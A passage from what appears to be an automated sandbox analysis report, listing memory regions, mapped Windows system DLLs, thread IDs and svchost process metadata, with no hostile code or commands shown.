"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5713 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5714 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 5715 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 5716 start_va = 0x7ff8fc5d0000 end_va = 0x7ff8fc7b7fff monitored = 0 entry_point = 0x7ff8fc5fba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5717 start_va = 0x7ff8fd1f0000 end_va = 0x7ff8fd29cfff monitored = 0 entry_point = 0x7ff8fd2081a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5718 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5719 start_va = 0x7ff8fe0a0000 end_va = 0x7ff8fe13cfff monitored = 0 entry_point = 0x7ff8fe0a78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5720 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 5721 start_va = 0x7ff8fcfc0000 end_va = 0x7ff8fd0dbfff monitored = 0 entry_point = 0x7ff8fd0002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5722 start_va = 0x7ff8fccd0000 end_va = 0x7ff8fcf4cfff monitored = 0 entry_point = 0x7ff8fcda4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5723 start_va = 0x7ff8fc870000 end_va = 0x7ff8fc8d9fff monitored = 0 entry_point = 0x7ff8fc8a6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5724 start_va = 0x7ff8fdf10000 end_va = 0x7ff8fdfd0fff monitored = 0 entry_point = 0x7ff8fdf30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5725 start_va = 0x5a0000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 5726 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5835 start_va = 0x650000 end_va = 0x792fff monitored = 0 entry_point = 0x678210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5836 start_va = 0x650000 end_va = 0x72cfff monitored = 0 entry_point = 0x6ae0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5837 start_va = 0x7ff8fbf40000 end_va = 0x7ff8fbf4efff monitored = 0 entry_point = 0x7ff8fbf43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5838 start_va = 0x7ff8fda00000 end_va = 0x7ff8fdb55fff monitored = 0 entry_point = 0x7ff8fda0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5839 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5840 start_va = 0x7ff8fd870000 end_va = 0x7ff8fd9f5fff monitored = 0 entry_point = 0x7ff8fd8bffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5841 start_va = 0x650000 end_va = 0x7d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 5842 start_va = 0x7e0000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 5843 start_va = 0x970000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 5942 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5943 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5944 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskhostw.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui") Region: id = 5945 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5946 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 5947 start_va = 0x7ff8fe040000 end_va = 0x7ff8fe09afff monitored = 0 entry_point = 0x7ff8fe0538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6153 start_va = 0x5a0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 6154 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 6155 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 6156 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 6157 start_va = 0x7ff8fdb60000 end_va = 0x7ff8fdc06fff monitored = 0 entry_point = 0x7ff8fdb6b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6158 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6159 start_va = 0x7ff8f1c60000 end_va = 0x7ff8f1c6efff monitored = 0 entry_point = 0x7ff8f1c62c50 region_type = mapped_file name = "dimsjob.dll" filename = "\\Windows\\System32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll") Region: id = 6199 start_va = 0x7ff8f1830000 end_va = 0x7ff8f189dfff monitored = 0 entry_point = 0x7ff8f187e6c0 region_type = mapped_file name = "tpmcoreprovisioning.dll" filename = "\\Windows\\System32\\TpmCoreProvisioning.dll" (normalized: "c:\\windows\\system32\\tpmcoreprovisioning.dll") Region: id = 6200 start_va = 0x7ff8f18a0000 end_va = 0x7ff8f18b0fff monitored = 0 entry_point = 0x7ff8f18a6710 region_type = mapped_file name = "tpmtasks.dll" filename = "\\Windows\\System32\\TpmTasks.dll" (normalized: "c:\\windows\\system32\\tpmtasks.dll") Region: id = 6201 start_va = 0x7ff8f5d40000 end_va = 0x7ff8f5d7dfff monitored = 0 entry_point = 0x7ff8f5d4a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6202 start_va = 0x7ff8f5eb0000 end_va = 0x7ff8f5f77fff monitored = 0 entry_point = 0x7ff8f5ef13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 6203 start_va = 0x7ff8fb360000 end_va = 0x7ff8fb36bfff monitored = 0 entry_point = 0x7ff8fb3627e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6204 start_va = 0x7ff8fba80000 end_va = 0x7ff8fbab9fff monitored = 0 entry_point = 0x7ff8fba88d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 6205 start_va = 0x7ff8fbac0000 end_va = 0x7ff8fbae6fff monitored = 0 entry_point = 0x7ff8fbad0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 6206 start_va = 0x7ff8fbd80000 end_va = 0x7ff8fbda8fff monitored = 0 entry_point = 0x7ff8fbd94530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6207 start_va = 0x7ff8fbf70000 end_va = 0x7ff8fbf7ffff monitored = 0 entry_point = 0x7ff8fbf756e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6208 start_va = 0x7ff8fca70000 end_va = 0x7ff8fcc36fff monitored = 0 entry_point = 0x7ff8fcacdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6209 start_va = 0x7ff8fdc10000 end_va = 0x7ff8fdcb6fff monitored = 0 entry_point = 0x7ff8fdc258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Thread: id = 366 os_tid = 0x4cc Thread: id = 386 os_tid = 0x5c4 Thread: id = 424 os_tid = 0x6e0 Thread: id = 432 os_tid = 0x700 Process: id = "86" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4b210000" os_pid = "0x3b8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "84" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cc39" [0xc000000f], "LOCAL" [0x7] Region: id = 5551 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5552 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5553 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5554 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5555 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5556 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 5557 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5558 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5559 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 5560 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5561 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 5562 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 5563 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5564 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5565 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 5566 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 5567 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 5568 start_va = 0x510000 end_va = 0x516fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5569 start_va = 0x520000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5570 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5571 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 5572 start_va = 0x8e0000 end_va = 0x8e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 5573 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 5574 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 5575 start_va = 0xb90000 end_va = 0xf8afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 5576 start_va = 0xf90000 end_va = 0xfd8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 5577 start_va = 0x1020000 end_va = 0x1026fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 5578 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 5579 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 5580 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 5581 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 5582 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 5583 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 5584 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 5585 start_va = 0x1a00000 end_va = 0x29fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 5586 start_va = 0x2b00000 end_va = 0x2e36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5587 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 5588 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 5589 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 5590 start_va = 0x38f0000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 5591 start_va = 0x3a70000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 5592 start_va = 0x3bf0000 end_va = 0x3ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 5593 start_va = 0x3cf0000 end_va = 0x44effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-18.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-18.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-18.dat") Region: id = 5594 start_va = 0x45f0000 end_va = 0x46effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 5595 start_va = 0x46f0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 5596 start_va = 0x47f0000 end_va = 0x48effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 5597 start_va = 0x48f0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 5598 start_va = 0x49f0000 end_va = 0x4aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 5599 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5600 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 5601 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 5602 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 5603 start_va = 0x7ff6d0320000 end_va = 0x7ff6d032cfff monitored = 0 entry_point = 0x7ff6d0323980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5604 start_va = 0x7ff8f45f0000 end_va = 0x7ff8f45fdfff monitored = 0 entry_point = 0x7ff8f45f1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 5605 start_va = 0x7ff8f4600000 end_va = 0x7ff8f468afff monitored = 0 entry_point = 0x7ff8f461d2a0 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 5606 start_va = 0x7ff8f55b0000 end_va = 0x7ff8f55bcfff monitored = 0 entry_point = 0x7ff8f55b2650 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 5607 start_va = 0x7ff8f5cf0000 end_va = 0x7ff8f5cfbfff monitored = 0 entry_point = 0x7ff8f5cf14d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 5608 start_va = 0x7ff8f5e30000 end_va = 0x7ff8f5ea9fff monitored = 0 entry_point = 0x7ff8f5e57630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 5609 start_va = 0x7ff8f6060000 end_va = 0x7ff8f6088fff monitored = 0 entry_point = 0x7ff8f60724d0 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 5610 start_va = 0x7ff8f6220000 end_va = 0x7ff8f63c1fff monitored = 0 entry_point = 0x7ff8f626c2d0 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 5611 start_va = 0x7ff8f63e0000 end_va = 0x7ff8f63f7fff monitored = 0 entry_point = 0x7ff8f63e5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 5612 start_va = 0x7ff8f8720000 end_va = 0x7ff8f8769fff monitored = 0 entry_point = 0x7ff8f872ac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 5613 start_va = 0x7ff8f8770000 end_va = 0x7ff8f87a2fff monitored = 0 entry_point = 0x7ff8f877d5a0 region_type = mapped_file name = "biwinrt.dll" filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll") Region: id = 5614 start_va = 0x7ff8f87b0000 end_va = 0x7ff8f8841fff monitored = 0 entry_point = 0x7ff8f87fa780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 5615 start_va = 0x7ff8f8850000 end_va = 0x7ff8f88c8fff monitored = 0 entry_point = 0x7ff8f8867800 region_type = mapped_file name = "geolocation.dll" filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll") Region: id = 5616 start_va = 0x7ff8f88d0000 end_va = 0x7ff8f88e9fff monitored = 0 entry_point = 0x7ff8f88db670 region_type = mapped_file name = "tzautoupdate.dll" filename = "\\Windows\\System32\\tzautoupdate.dll" (normalized: "c:\\windows\\system32\\tzautoupdate.dll") Region: id = 5617 start_va = 0x7ff8f8970000 end_va = 0x7ff8f89a5fff monitored = 0 entry_point = 0x7ff8f8980070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 5618 start_va = 0x7ff8faa10000 end_va = 0x7ff8fab0ffff monitored = 0 entry_point = 0x7ff8faa50f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 5619 start_va = 0x7ff8fb090000 end_va = 0x7ff8fb183fff monitored = 0 entry_point = 0x7ff8fb09a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 5620 start_va = 0x7ff8fb6b0000 end_va = 0x7ff8fb6cefff monitored = 0 entry_point = 0x7ff8fb6b5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5621 start_va = 0x7ff8fbd80000 end_va = 0x7ff8fbda8fff monitored = 0 entry_point = 0x7ff8fbd94530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5622 start_va = 0x7ff8fbf40000 end_va = 0x7ff8fbf4efff monitored = 0 entry_point = 0x7ff8fbf43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5623 start_va = 0x7ff8fbf50000 end_va = 0x7ff8fbf63fff monitored = 0 entry_point = 0x7ff8fbf552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5624 start_va = 0x7ff8fc5d0000 end_va = 0x7ff8fc7b7fff monitored = 0 entry_point = 0x7ff8fc5fba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5625 start_va = 0x7ff8fc870000 end_va = 0x7ff8fc8d9fff monitored = 0 entry_point = 0x7ff8fc8a6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5626 start_va = 0x7ff8fc9b0000 end_va = 0x7ff8fca64fff monitored = 0 entry_point = 0x7ff8fc9f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5627 start_va = 0x7ff8fccd0000 end_va = 0x7ff8fcf4cfff monitored = 0 entry_point = 0x7ff8fcda4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5628 start_va = 0x7ff8fcfc0000 end_va = 0x7ff8fd0dbfff monitored = 0 entry_point = 0x7ff8fd0002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5629 start_va = 0x7ff8fd1f0000 end_va = 0x7ff8fd29cfff monitored = 0 entry_point = 0x7ff8fd2081a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5630 start_va = 0x7ff8fd870000 end_va = 0x7ff8fd9f5fff monitored = 0 entry_point = 0x7ff8fd8bffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5631 start_va = 0x7ff8fda00000 end_va = 0x7ff8fdb55fff monitored = 0 entry_point = 0x7ff8fda0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5632 start_va = 0x7ff8fdb60000 end_va = 0x7ff8fdc06fff monitored = 0 entry_point = 0x7ff8fdb6b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5633 start_va = 0x7ff8fdc10000 end_va = 0x7ff8fdcb6fff monitored = 0 entry_point = 